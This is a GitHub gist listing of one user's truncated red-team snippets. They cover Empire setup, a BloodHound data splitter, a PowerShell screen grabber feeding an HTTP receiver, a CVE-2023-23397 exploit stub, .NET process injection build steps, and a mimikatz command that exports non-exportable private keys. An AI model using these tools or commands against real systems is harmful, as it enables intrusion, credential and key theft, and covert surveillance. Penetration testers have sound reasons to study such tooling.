Skip to content

Instantly share code, notes, and snippets.

tothi /
Created January 4, 2024 00:58
PowerShell Empire install notes for Arch Linux

Notes on installing PowerShell Empire for Arch Linux

Default installer scripts works for .deb based distros like Debian, Ubuntu and Kali and not for Arch Linux (pacman).

Here are some hints on installing Empire for ArchLinux. Base repo is here:

  1. Clone the repo recursively:
git clone --recursive
tothi /
Last active March 13, 2024 13:48 — forked from Acebond/
Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful due to the Electron memory limitations and BloodHound CE (running in browser) 1GB file size limitation.
# Based on
# updated to current BloodHound JSON format (compatible with SharpHound 2.x and BloodHound CE)
# pip install simplejson
import simplejson
import sys
def splitfile(file_name, object_limit):
print(f"[*] Loading {file_name}")
with open(file_name) as f:
tothi / PrtSc_Screenshotter.ps1
Created September 16, 2023 20:00
Capture screenshot by sending PrtSc key using PowerShell and grab it through HTTP with a Python CGI receiver
# dependency
Add-Type -AssemblyName System.Windows.Forms
# send PrtSc key (= capture the screen to the clipboard)
# save the image as PNG in memory
$png = New-Object System.IO.MemoryStream
[Windows.Forms.Clipboard]::GetImage().Save($png, [System.Drawing.Imaging.ImageFormat]::Png)
tothi /
Last active June 30, 2023 15:03
Full Disk Encryption with unattended auto-unlock using TPM2; hardened with Secure Boot on Kali

Full Disk Encryption w/ TPM2 on Kali

Short HOWTO about setting up Full Disk Encryption with unattended auto-unlock using TPM2 on Kali.

Useful for rogue devices (auto-connecting to C2), headless pentest boxes, etc. storing confidential information but lacking physical security.

NOTE: In order to maintain integrity and protect the encryption key, hardening the boot process with Secure Boot is a must. For making Secure Boot work (without messing up the default UEFI keys stored in the hardware), the Microsoft-signed UEFI shim loader is used (available in the Kali repo) which is able to load securely an arbitrary ELF image as 2nd stage

tothi / config.nims
Last active May 13, 2023 12:21
Nim config script for making Nim build compatible with Mingw-w64 (useful on ArchLinux setups because the defaults there break things)
# original idea:
# use case for
# - put this config.nims into NimPlant/client folder and build should work without errors on ArchLinux also
import std/strutils
import std/sequtils
# remove -fstack-clash-protection
switch("gcc.options.always", replace(get("gcc.options.always"), "-fstack-clash-protection", ""))
tothi /
Created April 17, 2023 00:09
Detect whether the remote MSMQ service on 1801/tcp is enabled or not by sending a valid message to the target
#!/usr/bin/env python3
# detect whether the remote MSMQ service on 1801/tcp is enabled or not
# by sending a valid message to the target
# resources:
tothi /
Created March 28, 2023 09:30
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
tothi /
Last active September 4, 2023 12:51
/etc/ssl/openssl.cnf supporting legacy digests like MD4 (useful for offensive tools requiring NTLM support)

This is a minimal /etc/ssl/openssl.cnf supporting legacy algorithms on modern openssl installations where it is disabled by default.

The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).

For checking if legacy providers are enabled successfully:

$ openssl list -providers
tothi / DInjectQueuerAPC.cs
Last active October 14, 2023 22:17 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
# cmd separator is |
# practical example: export machine certificates (including non-exportable private key :)):
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"